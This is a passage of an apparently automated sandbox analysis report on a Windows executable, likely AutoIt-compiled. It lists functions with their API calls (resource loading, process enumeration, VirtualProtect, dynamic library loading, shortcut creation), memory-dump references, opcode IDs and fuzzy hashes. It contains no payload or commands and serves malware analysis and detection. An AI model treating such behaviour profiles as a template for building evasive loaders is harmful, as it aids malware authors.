                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2717633055-0
                                                                                                                              • Opcode ID: 7336c0534e191edd2fd9fd1740821e2c8693ed833d5c462fd4eb206a18628e1e
                                                                                                                              • Instruction ID: a6bffee5a4c8be6f2c7875a323dadf7bf5a70b6cbde8a4f7eed517361c2616fc
                                                                                                                              • Opcode Fuzzy Hash: 7336c0534e191edd2fd9fd1740821e2c8693ed833d5c462fd4eb206a18628e1e
                                                                                                                              • Instruction Fuzzy Hash: 3861DDB590A2D4CBCF15DF6898C15ED7FA46F2A308F2945D8D8489B20BD734CA48CF66
                                                                                                                              Function 001731F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00173202
                                                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00173219
                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 001E57D7
                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 001E57EC
                                                                                                                              • LockResource.KERNEL32(?), ref: 001E57FF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                              • String ID: SCRIPT
                                                                                                                              • API String ID: 3051347437-3967369404
                                                                                                                              • Opcode ID: 0e6645a035a970fdf3ca9062052c89a29ca30d0224a4e5ee79f484537649f4a7
                                                                                                                              • Instruction ID: 5f56882f9d5f8eec572592dff47d35354273a34a9b36e45aae3ec937d5479fee
                                                                                                                              • Opcode Fuzzy Hash: 0e6645a035a970fdf3ca9062052c89a29ca30d0224a4e5ee79f484537649f4a7
                                                                                                                              • Instruction Fuzzy Hash: 7B117975204701BFE7218B65EC48F777BBAEBC9B51F218028F416866A0DB71DD40DAA0
                                                                                                                              Function 001B6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 001B6F7D
                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 001B6F8D
                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 001B6FAC
                                                                                                                              • __wsplitpath.LIBCMT ref: 001B6FD0
                                                                                                                              • _wcscat.LIBCMT ref: 001B6FE3
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 001B7022
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1605983538-0
                                                                                                                              • Opcode ID: 8bd5608172f3c7258e69d79608d711c9dc5d5d7475d20fe434265a5841aaa343
                                                                                                                              • Instruction ID: 204b4e85df92b2b2cb49b4dc0606c20cef43f2ce6e72e7c6e2d4930e9abdaa94
                                                                                                                              • Opcode Fuzzy Hash: 8bd5608172f3c7258e69d79608d711c9dc5d5d7475d20fe434265a5841aaa343
                                                                                                                              • Instruction Fuzzy Hash: 78219F71904219ABDB11ABA5DC88BEEB7BDAB59304F1004EAF505E3181E775AFC4CB60
                                                                                                                              Function 002E20D0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 002E220A
                                                                                                                              • GetProcAddress.KERNEL32(?,002DBFF9), ref: 002E2228
                                                                                                                              • ExitProcess.KERNEL32(?,002DBFF9), ref: 002E2239
                                                                                                                              • VirtualProtect.KERNEL32(00170000,00001000,00000004,?,00000000), ref: 002E2287
                                                                                                                              • VirtualProtect.KERNEL32(00170000,00001000), ref: 002E229C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1996367037-0
                                                                                                                              • Opcode ID: 2d0eff96b3bd31e6c293c13b80f90b9fcc516fecbb28576c2b05e8ea84deffe4
                                                                                                                              • Instruction ID: 35f912926b5d8df917975f21c2eedf29234e29db1744217491f1db1aed51bfd4
                                                                                                                              • Opcode Fuzzy Hash: 2d0eff96b3bd31e6c293c13b80f90b9fcc516fecbb28576c2b05e8ea84deffe4
                                                                                                                              • Instruction Fuzzy Hash: 6D510A726F4293CAD7249EB9CC80660779CEB513207980738CAE7CB3C6E790591D8760
                                                                                                                              Function 001BEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001B78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 001B78CB
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 001BF04D
                                                                                                                              • CoCreateInstance.COMBASE(001FDA7C,00000000,00000001,001FD8EC,?), ref: 001BF066
                                                                                                                              • CoUninitialize.COMBASE ref: 001BF083
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                              • String ID: .lnk
                                                                                                                              • API String ID: 2126378814-24824748
                                                                                                                              • Opcode ID: 76732f29bd50e969bdf98e79e7ddd9485e6c0217fde9315ab22a7e74fa436401
                                                                                                                              • Instruction ID: d3505b035ce1b33fcb88353680ec40b7e21d3faad81b4c4d789c99cb2d388cdc
                                                                                                                              • Opcode Fuzzy Hash: 76732f29bd50e969bdf98e79e7ddd9485e6c0217fde9315ab22a7e74fa436401
                                                                                                                              • Instruction Fuzzy Hash: 1FA12535604301AFC714DF54C884E6ABBF6BF98320F14899CF99A9B2A1CB31ED45CB91
                                                                                                                              Function 0018DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNEL32(0017C848,0017C848), ref: 0018DDA2
                                                                                                                              • FindFirstFileW.KERNEL32(0017C848,?), ref: 001E4A83
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AttributesFindFirst
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4185537391-0
                                                                                                                              • Opcode ID: b2ea965d825451eb983ebe287d44f26c25719100d18cc0bfc0e4818a9d7a72a5
                                                                                                                              • Instruction ID: 59eee11c1f6e6839bc9cc62fddf5f92b7b1ce379624d461c556106e5b07c9638
                                                                                                                              • Opcode Fuzzy Hash: b2ea965d825451eb983ebe287d44f26c25719100d18cc0bfc0e4818a9d7a72a5
                                                                                                                              • Instruction Fuzzy Hash: 51E0DF32418901AB82187778FC0D8FE379D9B46338B200755F836C24E0EB70AE91CBDA
                                                                                                                              Function 0017DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b02488b0d1ea7ec57267e356ef34d2506881048cf940c3589db46a457d73e68a
                                                                                                                              • Instruction ID: 833a1b00c35ffca5930e48cd40cbb0a1412a5929a2a4d905452affec2b8b0e19
                                                                                                                              • Opcode Fuzzy Hash: b02488b0d1ea7ec57267e356ef34d2506881048cf940c3589db46a457d73e68a
                                                                                                                              • Instruction Fuzzy Hash: AD229E70A00209DFDB24DF98D491ABEB7F0FF19310F15C0A9E85A9B391E771A985CB91
                                                                                                                              Function 00183680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3964851224-0
                                                                                                                              • Opcode ID: eeaf8184224624fbc5f140214b8dd0d995f5544a0850ef8ffe0f5be632e535d6
                                                                                                                              • Instruction ID: 4b011729de1b1122439015d9caeef8a4714d0a9d87da61ffac72718da23588d8
                                                                                                                              • Opcode Fuzzy Hash: eeaf8184224624fbc5f140214b8dd0d995f5544a0850ef8ffe0f5be632e535d6
                                                                                                                              • Instruction Fuzzy Hash: 9E9269706082418FD724EF18C494B6AB7F0BF98704F58885DF99A8B292D771EE45CF92
                                                                                                                              Function 001EC146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: NameUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2645101109-0
                                                                                                                              • Opcode ID: 3c767dc3cf493700f796d612fc3552bfa2c54f4e8e3ff31bf29e0d21f6a5de93
                                                                                                                              • Instruction ID: d9a421bec3f9fb996cc4a8dbb19242213f2ed413f70f78b1a41aaac1420541f2
                                                                                                                              • Opcode Fuzzy Hash: 3c767dc3cf493700f796d612fc3552bfa2c54f4e8e3ff31bf29e0d21f6a5de93
                                                                                                                              • Instruction Fuzzy Hash: C7C04CB140400DEFCB15CB90D9859FFB7BCBB04300F204495A116E2000D7709B459B71
                                                                                                                              Function 0017E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017E279
                                                                                                                              • timeGetTime.WINMM ref: 0017E51A
                                                                                                                              • TranslateMessage.USER32(?), ref: 0017E646
                                                                                                                              • DispatchMessageW.USER32(?), ref: 0017E651
                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017E664
                                                                                                                              • LockWindowUpdate.USER32(00000000), ref: 0017E697
                                                                                                                              • DestroyWindow.USER32 ref: 0017E6A3
                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0017E6BD
                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 001E5B15
                                                                                                                              • TranslateMessage.USER32(?), ref: 001E62AF
                                                                                                                              • DispatchMessageW.USER32(?), ref: 001E62BD
                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001E62D1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                              • API String ID: 2641332412-570651680
                                                                                                                              • Opcode ID: 9f2ddca28f06a1468f7290ecb01dcc05205b32577f9119a66624e37e4cb2933b
                                                                                                                              • Instruction ID: 03057ccab5f5914649c74d5d29724bd969b48266f02d1b10a4712d48334448c2
                                                                                                                              • Opcode Fuzzy Hash: 9f2ddca28f06a1468f7290ecb01dcc05205b32577f9119a66624e37e4cb2933b
                                                                                                                              • Instruction Fuzzy Hash: D262D270508780DFDB24DF24C885BAA77F5BF58308F1489ADF94A8B292DB71D984CB52
                                                                                                                              Function 001A6A28 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ___createFile.LIBCMT ref: 001A6C73
                                                                                                                              • ___createFile.LIBCMT ref: 001A6CB4
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 001A6CDD
                                                                                                                              • __dosmaperr.LIBCMT ref: 001A6CE4
                                                                                                                              • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 001A6CF7
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 001A6D1A
                                                                                                                              • __dosmaperr.LIBCMT ref: 001A6D23
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 001A6D2C
                                                                                                                              • __set_osfhnd.LIBCMT ref: 001A6D5C
                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 001A6DC6
                                                                                                                              • __close_nolock.LIBCMT ref: 001A6DEC
                                                                                                                              • __chsize_nolock.LIBCMT ref: 001A6E1C
                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 001A6E2E
                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 001A6F26
                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 001A6F3B
                                                                                                                              • __close_nolock.LIBCMT ref: 001A6F9B
                                                                                                                                • Part of subcall function 0019F84C: CloseHandle.KERNEL32(00000000,0021EEC4,00000000,?,001A6DF1,0021EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0019F89C
                                                                                                                                • Part of subcall function 0019F84C: GetLastError.KERNEL32(?,001A6DF1,0021EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0019F8A6
                                                                                                                                • Part of subcall function 0019F84C: __free_osfhnd.LIBCMT ref: 0019F8B3
                                                                                                                                • Part of subcall function 0019F84C: __dosmaperr.LIBCMT ref: 0019F8D5
                                                                                                                                • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 001A6FBD
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 001A70F2
                                                                                                                              • ___createFile.LIBCMT ref: 001A7111
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 001A711E
                                                                                                                              • __dosmaperr.LIBCMT ref: 001A7125
                                                                                                                              • __free_osfhnd.LIBCMT ref: 001A7145
                                                                                                                              • __invoke_watson.LIBCMT ref: 001A7173
                                                                                                                              • __wsopen_helper.LIBCMT ref: 001A718D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 3896587723-2766056989
                                                                                                                              • Opcode ID: c28529b102f71f26e7cacba665d5857e9285aff6ffe2964fb7285e765518ad16
                                                                                                                              • Instruction ID: 096fb762a27bd20a2dec740f1787d094352eda29c5609323183177d399f61afd
                                                                                                                              • Opcode Fuzzy Hash: c28529b102f71f26e7cacba665d5857e9285aff6ffe2964fb7285e765518ad16
                                                                                                                              • Instruction Fuzzy Hash: 2E223479A042059FEF299F68DC95BBE7B61EB13324F2C4229E521EB2E1C7358D50C760
                                                                                                                              Function 001B76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 001B76ED
                                                                                                                              • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 001B7713
                                                                                                                              • _wcscpy.LIBCMT ref: 001B7741
                                                                                                                              • _wcscmp.LIBCMT ref: 001B774C
                                                                                                                              • _wcscat.LIBCMT ref: 001B7762
                                                                                                                              • _wcsstr.LIBCMT ref: 001B776D
                                                                                                                              • 751C1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001B7789
                                                                                                                              • _wcscat.LIBCMT ref: 001B77D2
                                                                                                                              • _wcscat.LIBCMT ref: 001B77D9
                                                                                                                              • _wcsncpy.LIBCMT ref: 001B7804
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscat$FileInfoVersion$C1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                              • API String ID: 2588870415-1459072770
                                                                                                                              • Opcode ID: 3c0bec22612c27f3ee36c2f848945ce5953eff176c99af63ac2565a14a2eee68
                                                                                                                              • Instruction ID: e26f87e5a8facde2215b52a565b7a43772b43f263563302568ab5ef6c4ce702a
                                                                                                                              • Opcode Fuzzy Hash: 3c0bec22612c27f3ee36c2f848945ce5953eff176c99af63ac2565a14a2eee68
                                                                                                                              • Instruction Fuzzy Hash: E741F771A44201BAEF01B7649C4BEFF77ACEF6A710F10006AF900A61D3EB74DA51D6A1
                                                                                                                              Function 00171F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              • GetForegroundWindow.USER32 ref: 00171FBE
                                                                                                                              • IsWindow.USER32(?), ref: 001E282E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
